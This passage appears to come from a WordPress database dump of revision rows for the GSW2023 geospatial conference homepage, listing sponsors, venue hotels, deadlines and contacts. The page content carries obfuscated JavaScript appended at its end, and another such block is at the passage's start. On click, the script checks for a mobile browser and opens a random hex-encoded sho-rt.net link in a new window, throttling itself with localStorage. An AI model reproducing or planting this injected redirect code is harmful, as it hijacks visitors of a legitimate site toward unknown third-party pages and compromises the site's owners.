|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-05-24 23:30:41','2023-05-24 23:30:41','',2659,'https://gsw2023.com/?p=4569',0,'revision','',0),
(4570,1,'2023-05-24 23:32:12','2023-05-24 23:32:12','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\